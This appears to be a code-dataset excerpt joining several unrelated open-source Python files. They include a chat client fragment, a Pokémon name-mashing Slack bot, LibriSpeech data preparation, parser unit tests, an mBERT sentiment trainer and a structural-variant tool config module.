self.chat.receive_message(channel, account, message["params"]["text"])
d.addCallbacks(sender_found, sender_not_found)
def channel_not_found(error):
# TODO: try to find the channel (if it's new), alert the user, etc
print "Channel not found", error
#
# private message
#
def priv_account_found(account):
text = message["params"]["text"]
self.chat.receive_private_message(account, text)
def priv_account_not_found(error):
# TODO: might be a new user; alert the user on failure
print "Account not found", error
room_id = message["room_id"]
if "-" in room_id:
# private message
account_id = message["from"]["id"]
d = self.chat.find_account_from_katoid(account_id)
d.addCallbacks(priv_account_found, priv_account_not_found)
else:
# channel message
d = self.chat.find_channel_from_katoid(room_id)
d.addCallbacks(channel_found, channel_not_found)
# used to indicate that a user is typing in a given room
# {
# # room_id can be in either chat room or private message format
# "room_id": "<ROOM_ID>",
# "from": {
# "name": "<NAME>",
# "email": "<EMAIL_ADDRESS>",
# "status": "(verified_email|unverified_email)",
# "id": "<ACCOUNT_ID>"
# },
# "type": "typing",
# "ts": 1379214313294
# }
# TODO
#def kato_TYPING(self, message):
# pass
# used to indicate that a user is no longer typing in a given room
# this message is only sent if a user does not send a message
# {
# # room_id can be in either chat room or private message format
# "room_id": "<ROOM_ID>",
# "from": {
# "name": "<NAME>",
# "email": "<EMAIL_ADDRESS>",
# "status": "(verified_email|unverified_email)",
# "id": "<ACCOUNT_ID>"
# },
# "type": "reset_typing",
# "ts": 1379306032396
# }
#def kato_RESET_TYPING(self, message):
# pass
# unknown type of message
def kato_unknown(self, message):
print "Received unknown message:"
import pprint
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(message)
| 2.109375
| 2
|
uqcsbot/scripts/pokemash.py
|
dhood/uqcsbot
| 38
|
12777740
|
<reponame>dhood/uqcsbot<filename>uqcsbot/scripts/pokemash.py
from uqcsbot import bot, Command
from re import match
from typing import Optional
POKEDEX = {"bulbasaur": 1,
"ivysaur": 2,
"venusaur": 3,
"charmander": 4,
"charmeleon": 5,
"charizard": 6,
"squirtle": 7,
"wartortle": 8,
"blastoise": 9,
"caterpie": 10,
"metapod": 11,
"butterfree": 12,
"weedle": 13,
"kakuna": 14,
"beedrill": 15,
"pidgey": 16,
"pidgeotto": 17,
"pidgeot": 18,
"rattata": 19,
"raticate": 20,
"spearow": 21,
"fearow": 22,
"ekans": 23,
"arbok": 24,
"pikachu": 25,
"raichu": 26,
"sandshrew": 27,
"sandslash": 28,
"nidoran(f)": 29,
"nidorina": 30,
"nidoqueen": 31,
"nidoran(m)": 32,
"nidorino": 33,
"nidoking": 34,
"clefairy": 35,
"clefable": 36,
"vulpix": 37,
"ninetales": 38,
"jigglypuff": 39,
"wigglytuff": 40,
"zubat": 41,
"golbat": 42,
"oddish": 43,
"gloom": 44,
"vileplume": 45,
"paras": 46,
"parasect": 47,
"venonat": 48,
"venomoth": 49,
"diglett": 50,
"dugtrio": 51,
"meowth": 52,
"persian": 53,
"psyduck": 54,
"golduck": 55,
"mankey": 56,
"primeape": 57,
"growlithe": 58,
"arcanine": 59,
"poliwag": 60,
"poliwhirl": 61,
"poliwrath": 62,
"abra": 63,
"kadabra": 64,
"alakazam": 65,
"machop": 66,
"machoke": 67,
"machamp": 68,
"bellsprout": 69,
"weepinbell": 70,
"victreebel": 71,
"tentacool": 72,
"tentacruel": 73,
"geodude": 74,
"graveler": 75,
"golem": 76,
"ponyta": 77,
"rapidash": 78,
"slowpoke": 79,
"slowbro": 80,
"magnemite": 81,
"magneton": 82,
"farfetchd": 83,
"doduo": 84,
"dodrio": 85,
"seel": 86,
"dewgong": 87,
"grimer": 88,
"muk": 89,
"shellder": 90,
"cloyster": 91,
"gastly": 92,
"haunter": 93,
"gengar": 94,
"onix": 95,
"drowzee": 96,
"hypno": 97,
"krabby": 98,
"kingler": 99,
"voltorb": 100,
"electrode": 101,
"exeggcute": 102,
"exeggutor": 103,
"cubone": 104,
"marowak": 105,
"hitmonlee": 106,
"hitmonchan": 107,
"lickitung": 108,
"koffing": 109,
"weezing": 110,
"rhyhorn": 111,
"rhydon": 112,
"chansey": 113,
"tangela": 114,
"kangaskhan": 115,
"horsea": 116,
"seadra": 117,
"goldeen": 118,
"seaking": 119,
"staryu": 120,
"starmie": 121,
"<NAME>": 122,
"scyther": 123,
"jynx": 124,
"electabuzz": 125,
"magmar": 126,
"pinsir": 127,
"tauros": 128,
"magikarp": 129,
"gyarados": 130,
"lapras": 131,
"ditto": 132,
"eevee": 133,
"vaporeon": 134,
"jolteon": 135,
"flareon": 136,
"porygon": 137,
"omanyte": 138,
"omastar": 139,
"kabuto": 140,
"kabutops": 141,
"aerodactyl": 142,
"snorlax": 143,
"articuno": 144,
"zapdos": 145,
"moltres": 146,
"dratini": 147,
"dragonair": 148,
"dragonite": 149,
"mewtwo": 150,
"mew": 151}
PREFIX = {1: "Bulb",
2: "Ivy",
3: "Venu",
4: "Char",
5: "Char",
6: "Char",
7: "Squirt",
8: "War",
9: "Blast",
10: "Cater",
11: "Meta",
12: "Butter",
13: "Wee",
14: "Kak",
15: "Bee",
16: "Pid",
17: "Pidg",
18: "Pidg",
19: "Rat",
20: "Rat",
21: "Spear",
22: "Fear",
23: "Ek",
24: "Arb",
25: "Pika",
26: "Rai",
27: "Sand",
28: "Sand",
29: "Nido",
30: "Nido",
31: "Nido",
32: "Nido",
33: "Nido",
34: "Nido",
35: "Clef",
36: "Clef",
37: "Vul",
38: "Nine",
39: "Jiggly",
40: "Wiggly",
41: "Zu",
42: "Gol",
43: "Odd",
44: "Gloo",
45: "Vile",
46: "Pa",
47: "Para",
48: "Veno",
49: "Veno",
50: "Dig",
51: "Dug",
52: "Meow",
53: "Per",
54: "Psy",
55: "Gol",
56: "Man",
57: "Prime",
58: "Grow",
59: "Arca",
60: "Poli",
61: "Poli",
62: "Poli",
63: "Ab",
64: "Kada",
65: "Ala",
66: "Ma",
67: "Ma",
68: "Ma",
69: "Bell",
70: "Weepin",
71: "Victree",
72: "Tenta",
73: "Tenta",
74: "Geo",
75: "Grav",
76: "Gol",
77: "Pony",
78: "Rapi",
79: "Slow",
80: "Slow",
81: "Magne",
82: "Magne",
83: "Far",
84: "Do",
85: "Do",
86: "See",
87: "Dew",
88: "Gri",
89: "Mu",
90: "Shell",
91: "Cloy",
92: "Gas",
93: "Haunt",
94: "Gen",
95: "On",
96: "Drow",
97: "Hyp",
98: "Krab",
99: "King",
100: "Volt",
101: "Electr",
102: "Exegg",
103: "Exegg",
104: "Cu",
105: "Maro",
106: "Hitmon",
107: "Hitmon",
108: "Licki",
109: "Koff",
110: "Wee",
111: "Rhy",
112: "Rhy",
113: "Chan",
114: "Tang",
115: "Kangas",
116: "Hors",
117: "Sea",
118: "Gold",
119: "Sea",
120: "Star",
121: "Star",
122: "Mr.",
123: "Scy",
124: "Jyn",
125: "Electa",
126: "Mag",
127: "Pin",
128: "Tau",
129: "Magi",
130: "Gyara",
131: "Lap",
132: "Dit",
133: "Ee",
134: "Vapor",
135: "Jolt",
136: "Flare",
137: "Pory",
138: "Oma",
139: "Oma",
140: "Kabu",
141: "Kabu",
142: "Aero",
143: "Snor",
144: "Artic",
145: "Zap",
146: "Molt",
147: "Dra",
148: "Dragon",
149: "Dragon",
150: "Mew",
151: "Mew"}
SUFFIX = {1: "basaur",
2: "ysaur",
3: "usaur",
4: "mander",
5: "meleon",
6: "izard",
7: "tle",
8: "tortle",
9: "toise",
10: "pie",
11: "pod",
12: "free",
13: "dle",
14: "una",
15: "drill",
16: "gey",
17: "eotto",
18: "eot",
19: "tata",
20: "icate",
21: "row",
22: "row",
23: "kans",
24: "bok",
25: "chu",
26: "chu",
27: "shrew",
28: "slash",
29: "oran",
30: "rina",
31: "queen",
32: "ran",
33: "rino",
34: "king",
35: "fairy",
36: "fable",
37: "pix",
38: "tales",
39: "puff",
40: "tuff",
41: "bat",
42: "bat",
43: "ish",
44: "oom",
45: "plume",
46: "ras",
47: "sect",
48: "nat",
49: "moth",
50: "lett",
51: "trio",
52: "th",
53: "sian",
54: "duck",
55: "duck",
56: "key",
57: "ape",
58: "lithe",
59: "nine",
60: "wag",
61: "whirl",
62: "wrath",
63: "ra",
64: "bra",
65: "kazam",
66: "chop",
67: "choke",
68: "champ",
69: "sprout",
70: "bell",
71: "bell",
72: "cool",
73: "cruel",
74: "dude",
75: "eler",
76: "em",
77: "ta",
78: "dash",
79: "poke",
80: "bro",
81: "mite",
82: "ton",
83: "fetchd",
84: "duo",
85: "drio",
86: "eel",
87: "gong",
88: "mer",
89: "uk",
90: "der",
91: "ster",
92: "tly",
93: "ter",
94: "gar",
95: "ix",
96: "zee",
97: "no",
98: "by",
99: "ler",
100: "orb",
101: "ode",
102: "cute",
103: "utor",
104: "bone",
105: "wak",
106: "lee",
107: "chan",
108: "tung",
109: "fing",
110: "zing",
111: "horn",
112: "don",
113: "sey",
114: "gela",
115: "khan",
116: "sea",
117: "dra",
118: "deen",
119: "king",
120: "yu",
121: "mie",
122: "mime",
123: "ther",
124: "nx",
125: "buzz",
126: "mar",
127: "sir",
128: "ros",
129: "karp",
130: "dos",
131: "ras",
132: "to",
133: "vee",
134: "eon",
135: "eon",
136: "eon",
137: "gon",
138: "nyte",
139: "star",
140: "to",
141: "tops",
142: "dactyl",
143: "lax",
144: "cuno",
145: "dos",
146: "tres",
147: "tini",
148: "nair",
149: "nite",
150: "two",
151: "ew"}
def lookup(command: Command, arg: str) -> Optional[int]:
"""
converts a string representing a pokemon's name or number to an integer
"""
try:
num = int(arg)
except ValueError:
if arg not in POKEDEX:
bot.post_message(command.channel_id, f"Could Not Find Pokemon: {arg}")
return None
num = POKEDEX[arg]
if num <= 0 or num > 151:
bot.post_message(command.channel_id, f"Out of Range: {arg}")
return None
return num
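# Illustrative usage (assuming a Command object `cmd`): lookup(cmd, "pikachu") and
# lookup(cmd, "25") both return 25, while lookup(cmd, "999") posts "Out of Range: 999"
# to the channel and returns None.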
@bot.on_command('pokemash')
def handle_pokemash(command: Command):
"""
`!pokemash pokemon pokemon` - Returns the pokemash of the two Pokemon.
Can use Pokemon names or Pokedex numbers (first gen only)
"""
cmd = command.arg.lower()
# checks for exactly two pokemon
    # mr. mime is the only pokemon with a space in its name
if not cmd or (cmd.count(" ") - cmd.count("mr. mime")) != 1:
bot.post_message(command.channel_id, "Incorrect Number of Pokemon")
return
# two pokemon split
arg_left, arg_right = match(r"(mr\. mime|\S+) (mr\. mime|\S+)", cmd).group(1, 2)
num_left = lookup(command, arg_left)
num_right = lookup(command, arg_right)
if num_left is None or num_right is None:
return
bot.post_message(command.channel_id,
f"_{PREFIX[num_left]+SUFFIX[num_right]}_\n"
f"https://images.alexonsager.net/pokemon/fused/"
+ f"{num_right}/{num_right}.{num_left}.png")
| 2.109375
| 2
|
cpc/prepare_librispeech_data.py
|
lokhiufung/quick-and-dirty-dl
| 0
|
12777741
|
<reponame>lokhiufung/quick-and-dirty-dl<filename>cpc/prepare_librispeech_data.py
import argparse
import glob
import os
import json
import soundfile as sf
import pandas as pd
DATASETS = ['train-clean-100']
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--data_root', '-D', type=str, help='data root of librispeech datasets')
# parser.add_argument('--wav', action='store_true', default=True)
args = parser.parse_args()
return args
def _extract_transcripts(filepath, ext='.trans.txt'):
tran_filepaths = list(glob.glob(f'{filepath}/*/*/*{ext}'))
# filename2transcript = {}
filename_transcript = []
for tran_filepath in tran_filepaths:
with open(tran_filepath, 'r') as f:
for line in f:
filename, transcript = line.strip().split(' ', 1) # split by the first space
# filename2transcript[filename] = transcript
filename_transcript.append((filename, transcript))
transcript_df = pd.DataFrame(filename_transcript, columns=['filename', 'transcript'])
return transcript_df
def _extract_audio(filepath, ext='.flac'):
audio_filepaths = list(glob.glob(f'{filepath}/*/*/*{ext}'))
# filename2audio = {
# os.path.basename(audio_filepath): audio_filepath for audio_filepath in audio_filepaths
# }
filename_audio = [
(os.path.basename(audio_filepath).replace(ext, ''), audio_filepath) for audio_filepath in audio_filepaths
]
audio_df = pd.DataFrame(filename_audio, columns=['filename', 'audio_filepath'])
return audio_df
# deprecated: soundfile reads .flac directly, so converting to .wav is unnecessary
def _flac_to_wav(audio_filepath, output_filepath):
output_filepath = audio_filepath.replace('.flac', '.wav')
os.system(f'ffmpeg -i {audio_filepath} {output_filepath}')
# return output_filepath
def _get_duration(audio_filepath):
audio, sample_rate = sf.read(audio_filepath)
return len(audio) / sample_rate
def _prepare_sample(audio_filepath, duration, text, sample_id, spk_id):
sample = dict()
sample['audio_filepath'] = audio_filepath
sample['duration'] = duration
sample['text'] = text
sample['sample_id'] = sample_id
sample['spk_id'] = spk_id
return sample
def write_df_to_manifest(df, output_filepath):
with open(output_filepath, 'w') as f:
for row in df.itertuples():
sample = _prepare_sample(
audio_filepath=row.audio_filepath,
duration=row.duration,
text=row.transcript.lower(),
sample_id=row.filename,
spk_id=row.filename.split('-', 1)[0]
)
f.write(json.dumps(sample) + '\n')
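# Each manifest line is a JSON object with these keys (values illustrative):
# {"audio_filepath": ".../1089-134686-0000.flac", "duration": 10.4,
#  "text": "lower-cased transcript", "sample_id": "1089-134686-0000", "spk_id": "1089"}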
def main():
args = parse_args()
data_root = args.data_root
# to_wav = args.wav
for dataset in DATASETS:
# ds_filepath = os.path.join(data_root, dataset)
# transcript_df = _extract_transcripts(ds_filepath)
# audio_df = _extract_audio(ds_filepath)
# df = transcript_df.merge(audio_df, how='inner', on='filename')
# # soundFile can open .flac file
# # if to_wav:
# # print('convert .flac to .wav ...')
# # df['audio_filepath'].apply(_flac_to_wav)
# df['duration'] = df['audio_filepath'].apply(_get_duration)
df = pd.read_csv(f'{data_root}/{dataset}.csv', sep='\t', header=None, names=['filename', 'transcript', 'audio_filepath', 'duration'])
write_df_to_manifest(
df[:-1000],
output_filepath=os.path.join(data_root, f'{dataset}-train.json')
)
write_df_to_manifest(
df[-1000:],
output_filepath=os.path.join(data_root, f'{dataset}-validation.json')
)
# output_filepath = os.path.join(data_root, f'{dataset}.csv')
# df.to_csv(
# output_filepath,
# sep='\t',
# header=False,
# index=False,
# )
# print(f'wrote {dataset} to {output_filepath}')
if __name__ == '__main__':
main()
| 2.71875
| 3
|
tests/test_youtube_sm_parser.py
|
shanedabes/youtube_sm_parser
| 2
|
12777742
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `youtube_sm_parser` package."""
import pytest
import unittest.mock
import deepdiff
import collections
import os
import xmltodict
import json
from youtube_sm_parser import youtube_sm_parser
def rel_fn(fn):
dir_name = os.path.dirname(os.path.realpath(__file__))
return os.path.join(dir_name, fn)
def mock_xml(fn):
with open(rel_fn(fn)) as f:
return xmltodict.parse(f.read())
def mock_xml_raw(fn):
with open(rel_fn(fn)) as f:
return f.read()
def mock_json(fn):
with open(rel_fn(fn)) as f:
return json.load(f, object_pairs_hook=collections.OrderedDict)
@pytest.fixture
def subs_file():
return mock_xml('subscription_manager.xml')
@pytest.fixture
def feed():
return mock_xml('feed.xml')
@pytest.fixture
def feed_raw():
return mock_xml_raw('feed.xml')
@pytest.fixture
def entry_dict():
return {
'id': 'id',
'title': 'video title',
'link': 'video_url',
'uploader': 'author name',
'published': '2019-05-14T11:00:01+00:00',
'thumbnail': 'thumb_url'
}
def test_extract_feeds(subs_file):
expected = ['test_chan_url', 'test_chan_url_2']
parsed_urls = youtube_sm_parser.extract_feeds(subs_file)
assert parsed_urls == expected
def test_get_entries(feed):
expected = [mock_json(i) for i in ['entry1.json', 'entry2.json']]
entries = youtube_sm_parser.get_entries(feed)
assert deepdiff.DeepDiff(entries, expected) == {}
def test_get_entries_empty():
expected = []
entries = youtube_sm_parser.get_entries({'feed': {}})
assert entries == expected
def test_entry_to_dict(entry_dict):
entry = mock_json('entry1.json')
expected = youtube_sm_parser.entry_to_dict(entry)
assert deepdiff.DeepDiff(entry_dict, expected) == {}
def test_format_dict(entry_dict):
format_string = '{title},{link}'
expected = 'video title,video_url'
formatted = youtube_sm_parser.format_dict(entry_dict, format_string)
assert formatted == expected
def test_feed_to_dicts(feed_raw, entry_dict):
class r():
content = feed_raw
entry_dicts = youtube_sm_parser.feed_to_dicts(r).data
assert entry_dicts[0] == entry_dict
@pytest.mark.parametrize('f', ['json', 'lines', 'yaml'])
def test_parse_args_format(f):
args = youtube_sm_parser.parse_args(['--format', f])
assert args.format == f
def test_invalid_format():
with pytest.raises(SystemExit):
args = youtube_sm_parser.parse_args('--format invalid'.split())
def test_line_format_valid():
args = youtube_sm_parser.parse_args('-l {title}'.split())
assert args.line_format == '{title}'
def test_line_format_invalid():
with pytest.raises(SystemExit):
args = youtube_sm_parser.parse_args('-l {invalid}'.split())
@unittest.mock.patch('youtube_sm_parser.youtube_sm_parser.FuturesSession')
def test_get_subscriptions(mock_fs, feed):
mock_fs.return_value.get.return_value.content = feed
subs = youtube_sm_parser.get_subscriptions(['blah'], 10)
@pytest.mark.parametrize('out_format, expected, line_format', [
['json', '[\n {\n "a": "b"\n }\n]', None],
['lines', 'b', '{a}'],
['yaml', '- a: b\n', None]
])
def test_get_output(out_format, expected, line_format):
entries = [{'a': 'b'}]
output = youtube_sm_parser.get_output(entries, out_format, line_format)
assert expected == output
| 2.4375
| 2
|
run.py
|
gwanghyeongim/flask-blog
| 0
|
12777743
|
<filename>run.py
from flaskblog import create_app
app = create_app()
if __name__ == '__main__':
app.run(debug=False) # run this when the file is executed
| 1.976563
| 2
|
tool/gongzi.py
|
FlyAlCode/RCLGeolocalization-2.0
| 4
|
12777744
|
# !/usr/bin/env python
# -*- coding:utf-8 -*-
age_init = 22
money_init = 16.0
ratio_1 = 1.05 # 5% annual increase
ratio_2 = 1.05
ratio_t = 0.96
# From graduation to self-directed retirement (自主)
money = [money_init]
for age in range(age_init+1, age_init + 21):
money.append(money[-1] * ratio_1 * ratio_t)
# print(money[-1])
# From self-directed retirement (自主) until death
money_init_2 = money[-1] * (1 - 2.4 / money_init) * 0.8
money.append(money_init_2)
for age in range(age_init + 20 + 1, 93):
money.append(money[-1] * ratio_2 * ratio_t)
# print(money[-1])
print('Before self-directed retirement:')
print(money[0:21])
print('After self-directed retirement:')
print(money[21:71])
total_money = sum(money)
print('Total = ', total_money)
value = 100
for i in range(0, 21):
    value = value / 0.96
print('value = ', value)
| 3.671875
| 4
|
sentiment/mBert.py
|
fajri91/minangNLP
| 7
|
12777745
|
<gh_stars>1-10
#!/usr/bin/env python
# coding: utf-8
# In[34]:
import json, glob, os, random
import argparse
import logging
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from sklearn.metrics import f1_score, accuracy_score
from transformers import BertTokenizer, BertModel, BertConfig
from transformers import AdamW, get_linear_schedule_with_warmup
logger = logging.getLogger(__name__)
# In[35]:
def set_seed(args):
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
# In[36]:
class BertData():
def __init__(self, args):
self.tokenizer = BertTokenizer.from_pretrained('bert-base-multilingual-uncased', do_lower_case=True)
self.sep_token = '[SEP]'
self.cls_token = '[CLS]'
self.pad_token = '[PAD]'
self.sep_vid = self.tokenizer.vocab[self.sep_token]
self.cls_vid = self.tokenizer.vocab[self.cls_token]
self.pad_vid = self.tokenizer.vocab[self.pad_token]
self.MAX_TOKEN = args.max_token
def preprocess_one(self, src_txt, label):
src_subtokens = [self.cls_token] + self.tokenizer.tokenize(src_txt) + [self.sep_token]
src_subtoken_idxs = self.tokenizer.convert_tokens_to_ids(src_subtokens)
if len(src_subtoken_idxs) > self.MAX_TOKEN:
src_subtoken_idxs = src_subtoken_idxs[:self.MAX_TOKEN]
src_subtoken_idxs[-1] = self.sep_vid
else:
src_subtoken_idxs += [self.pad_vid] * (self.MAX_TOKEN-len(src_subtoken_idxs))
segments_ids = [0] * len(src_subtoken_idxs)
assert len(src_subtoken_idxs) == len(segments_ids)
return src_subtoken_idxs, segments_ids, label
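    # Illustrative result: preprocess_one(text, 1) returns a triple of
    # (token ids padded/truncated to MAX_TOKEN, MAX_TOKEN segment ids of 0, 1).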
def preprocess(self, src_txts, labels):
assert len(src_txts) == len(labels)
output = []
for idx in range(len(src_txts)):
output.append(self.preprocess_one(src_txts[idx], labels[idx]))
return output
# In[37]:
class Batch():
def __init__(self, data, idx, batch_size, device):
cur_batch = data[idx:idx+batch_size]
src = torch.tensor([x[0] for x in cur_batch])
seg = torch.tensor([x[1] for x in cur_batch])
label = torch.tensor([x[2] for x in cur_batch])
        mask_src = (src != 0)  # attention mask: True for real tokens, False for padding
        self.src = src.to(device)
        self.seg = seg.to(device)
        self.label = label.to(device)
        self.mask_src = mask_src.to(device)
def get(self):
return self.src, self.seg, self.label, self.mask_src
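    # Illustrative shapes for a full batch: src, seg and mask_src are (batch_size, MAX_TOKEN)
    # tensors, label is a (batch_size,) tensor, and all four live on the target device.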
# In[38]:
class Model(nn.Module):
def __init__(self, args, device):
super(Model, self).__init__()
self.args = args
self.device = device
self.bert = BertModel.from_pretrained('bert-base-multilingual-uncased')
self.linear = nn.Linear(self.bert.config.hidden_size, 1)
self.dropout = nn.Dropout(0.2)
self.sigmoid = nn.Sigmoid()
self.loss = torch.nn.BCELoss(reduction='none')
def forward(self, src, seg, mask_src):
top_vec, _ = self.bert(input_ids=src, token_type_ids=seg, attention_mask=mask_src)
top_vec = self.dropout(top_vec)
top_vec *= mask_src.unsqueeze(dim=-1).float()
top_vec = torch.sum(top_vec, dim=1) / mask_src.sum(dim=-1).float().unsqueeze(-1)
conclusion = self.linear(top_vec).squeeze()
return self.sigmoid(conclusion)
def get_loss(self, src, seg, label, mask_src):
output = self.forward(src, seg, mask_src)
return self.loss(output, label.float())
def predict(self, src, seg, mask_src):
output = self.forward(src, seg, mask_src)
prediction = output.cpu().data.numpy() > 0.5
        if isinstance(prediction, np.bool_):
return [int(prediction)]
return [int(x) for x in prediction]
# In[39]:
def prediction(dataset, model, args):
preds = []
golds = []
model.eval()
for j in range(0, len(dataset), args.batch_size):
src, seg, label, mask_src = Batch(dataset, j, args.batch_size, args.device).get()
preds += model.predict(src, seg, mask_src)
golds += label.cpu().data.numpy().tolist()
return f1_score(golds, preds), accuracy_score(golds, preds)
# In[40]:
def train(args, train_dataset, dev_dataset, test_dataset, model):
""" Train the model """
# Prepare optimizer and schedule (linear warmup and decay)
no_decay = ["bias", "LayerNorm.weight"]
t_total = len(train_dataset) // args.batch_size * args.num_train_epochs
optimizer_grouped_parameters = [
{
"params": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay,
},
{"params": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], "weight_decay": 0.0},
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
scheduler = get_linear_schedule_with_warmup(
optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=t_total
)
# Train!
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Num Epochs = %d", args.num_train_epochs)
logger.info(" Total optimization steps = %d", t_total)
logger.info(" Warming up = %d", args.warmup_steps)
logger.info(" Patience = %d", args.patience)
    # Added here for reproducibility
set_seed(args)
tr_loss = 0.0
global_step = 1
best_f1_dev = 0
best_f1_test = 0
cur_patience = 0
for i in range(int(args.num_train_epochs)):
random.shuffle(train_dataset)
epoch_loss = 0.0
for j in range(0, len(train_dataset), args.batch_size):
src, seg, label, mask_src = Batch(train_dataset, j, args.batch_size, args.device).get()
model.train()
loss = model.get_loss(src, seg, label, mask_src)
loss = loss.sum()/args.batch_size
if args.n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu parallel (not distributed) training
loss.backward()
tr_loss += loss.item()
epoch_loss += loss.item()
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step() # Update learning rate schedule
model.zero_grad()
global_step += 1
logger.info("Finish epoch = %s, loss_epoch = %s", i+1, epoch_loss/global_step)
dev_f1, dev_acc = prediction(dev_dataset, model, args)
if dev_f1 > best_f1_dev:
best_f1_dev = dev_f1
test_f1, test_acc = prediction(test_dataset, model, args)
best_f1_test = test_f1
cur_patience = 0
logger.info("Better, BEST F1 in DEV = %s & BEST F1 in test = %s.", best_f1_dev, best_f1_test)
else:
cur_patience += 1
if cur_patience == args.patience:
logger.info("Early Stopping Not Better, BEST F1 in DEV = %s & BEST F1 in test = %s.", best_f1_dev, best_f1_test)
break
else:
logger.info("Not Better, BEST F1 in DEV = %s & BEST F1 in test = %s.", best_f1_dev, best_f1_test)
return global_step, tr_loss / global_step, best_f1_dev, best_f1_test
# In[ ]:
class Args:
max_token=200
batch_size=30
learning_rate=5e-5
weight_decay=0
adam_epsilon=1e-8
max_grad_norm=1.0
num_train_epochs=20
warmup_steps=242
logging_steps=200
seed=2020
local_rank=-1
patience=5
no_cuda = False
args = Args()
# Setup CUDA, GPU & distributed training
if args.local_rank == -1 or args.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
else: # Initializes the distributed backend which will take care of synchronizing nodes/GPUs
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
torch.distributed.init_process_group(backend="nccl")
args.n_gpu = 1
args.device = device
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if args.local_rank in [-1, 0] else logging.WARN,
)
set_seed(args)
# Load pretrained model and tokenizer
if args.local_rank not in [-1, 0]:
# Make sure only the first process in distributed training will download model & vocab
torch.distributed.barrier()
if args.local_rank == 0:
# Make sure only the first process in distributed training will download model & vocab
torch.distributed.barrier()
bertdata = BertData(args)
dev_f1s = 0.0
test_f1s = 0.0
for idx in range(5):
trainset = pd.read_excel('data/folds/train'+str(idx)+'.xlsx')
devset = pd.read_excel('data/folds/dev'+str(idx)+'.xlsx')
testset = pd.read_excel('data/folds/test'+str(idx)+'.xlsx')
xtrain, ytrain = list(trainset['minang']), list(trainset['sentiment'])
xdev, ydev = list(devset['minang']), list(devset['sentiment'])
xtest, ytest = list(testset['minang']), list(testset['sentiment'])
model = Model(args, device)
model.to(args.device)
train_dataset = bertdata.preprocess(xtrain, ytrain)
dev_dataset = bertdata.preprocess(xdev, ydev)
test_dataset = bertdata.preprocess(xtest, ytest)
global_step, tr_loss, best_f1_dev, best_f1_test = train(args, train_dataset, dev_dataset, test_dataset, model)
dev_f1s += best_f1_dev
test_f1s += best_f1_test
print('End of Training 5-fold')
print('Dev set F1', dev_f1s/5.0)
print('Test set F1', test_f1s/5.0)
# In[ ]:
| 2.28125
| 2
|
SLpackage/private/pacbio/pythonpkgs/pbsvtools/lib/python2.7/site-packages/pbsv1/config.py
|
fanglab/6mASCOPE
| 5
|
12777746
|
<reponame>fanglab/6mASCOPE<filename>SLpackage/private/pacbio/pythonpkgs/pbsvtools/lib/python2.7/site-packages/pbsv1/config.py
"""
Class svconfig defines parameters for structural variation tools.
"""
from __future__ import absolute_import
import logging
import ConfigParser
import shutil
import StringIO
import traceback
from .independent.utils import realpath, str2bool
from .Constants import MARKDUP_PARAMS, CHAIN_PARAMS, SGE_PARAMS, SVCALL_PARAMS, ALIGN_PARAMS
log = logging.getLogger()
__all__ = []
def svconfig_write(svconfig, writer):
"""Write SVConfig to writer.
"""
man = SVConfigManipulator()
man.write(svconfig, writer)
class SVConfigData(object):
"""This has as few extraneous attributes as possible.
"""
def __init__(self):
# pylint wants to see actual attrs
self.nproc = None
self.tmp_dir = None
self.chain_min_mapq = None
self.chain_max_gap = None
self.inversion_poswiggle = None
self.cfg_fn = None
def SVConfig(cfg_fn = None):
"""Return SVConfigData
Usage:
c = SVConfig('a.cfg')
c.nproc == 4
c.nproc = 5
write_svconfig(c, open('b.cfg'))
"""
creator = SVConfigManipulator()
svconfig = creator.create_default()
if cfg_fn is not None:
cfg_fn = realpath(cfg_fn)
log.debug('Reading Config from {!r}'.format(cfg_fn))
with open(cfg_fn) as reader:
svconfig = creator.update(svconfig, reader)
svconfig.cfg_fn = cfg_fn
return svconfig
class SVConfigManipulator(object):
# default parameters of sections
SECTIONS = {"markdup": MARKDUP_PARAMS, "chain": CHAIN_PARAMS,
"call": SVCALL_PARAMS, "sge": SGE_PARAMS,
'align': ALIGN_PARAMS}
@classmethod
def create_default(cls):
svconfig = SVConfigData()
writer = StringIO.StringIO()
cls._write_default_cfg(writer)
cfg_content = writer.getvalue()
reader = StringIO.StringIO(cfg_content)
cls._update_from_config(svconfig.__dict__, reader)
return svconfig
@classmethod
def update(cls, svconfig, cfgfp):
"""Given SVConfig and ConfigParser-file-reader, update and return SVConfig.
"""
cls._update_from_config(svconfig.__dict__, cfgfp)
return svconfig
@classmethod
def _write_default_cfg(cls, writer):
"""Write a ConfigParser file, based on defaults in SECTIONS.
"""
for section, params in cls.SECTIONS.iteritems():
writer.write('[{}]\n'.format(section))
for param in params:
writer.write('{} = {}\n'.format(param.name, param.val))
@classmethod
def _update_from_config(cls, param_dict, reader):
cfg = ConfigParser.ConfigParser()
cfg.readfp(reader)
for section in cfg.sections():
if not cls._is_section(section):
log.warning("Ignore unexpected section %s.", section)
else:
for name, val in cfg.items(section):
if cls._is_param(name, section):
param_dict[name] = cls._convert_param_val(name, val)
else:
log.warning("%s is not a valid param of section %s", name, section)
@classmethod
def _convert_param_val(cls, name, val_from_cfg):
try:
type = cls._get_param_type(name)
if type == bool:
return str2bool(val_from_cfg)
else:
return type(val_from_cfg)
except Exception:
raise ValueError('%s\nCould not convert %r to %r' % (traceback.format_exc(), val_from_cfg, type))
@classmethod
def _is_section(cls, section):
"""is section valid"""
return section.lower() in [s.lower() for s in cls.SECTIONS.keys()]
@classmethod
def _get_default_param(cls, name):
"""Return default param of name"""
